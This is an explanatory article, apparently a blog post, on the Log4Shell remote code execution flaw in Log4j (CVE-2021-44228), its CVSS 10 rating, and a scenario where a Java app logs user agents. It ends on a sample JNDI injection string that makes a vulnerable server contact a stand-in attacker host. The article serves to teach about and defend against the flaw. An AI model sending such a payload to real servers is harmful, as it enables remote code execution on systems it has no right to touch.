This article briefly describes a critical zero-day vulnerability called Log4Shell that existed in the widely used Java logging library Log4j used by millions of Java applications reachable from the Internet. The vulnerability can be exploited by even unskilled attackers and results in a remote code execution (RCE) when Log4j is used to write user controlled data into a log file.
The vulnerability is one of the worst ones in 2021 and was rated as very critical. It received a CVSS score of 10. CVSS is basically a metric to rate vulnerabilities and 10 is the maximum value that can be assigned to a vulnerability.The vulnerability was assigned the CVE number CVE-2021–44228.
Last update: 20th December, 2021
How Can an Attacker Exploit the Vulnerability?
Let’s assume you have a web application written in Java that logs the user agent of each request. You log this data because you use the data to create browser statistics for your web site in order to better optimize the web site.
If you use a vulnerable Log4j to log the user agents, an attacker could set the following string as the user agent of a request:
${jndi:ldap://attacker.wtf/a}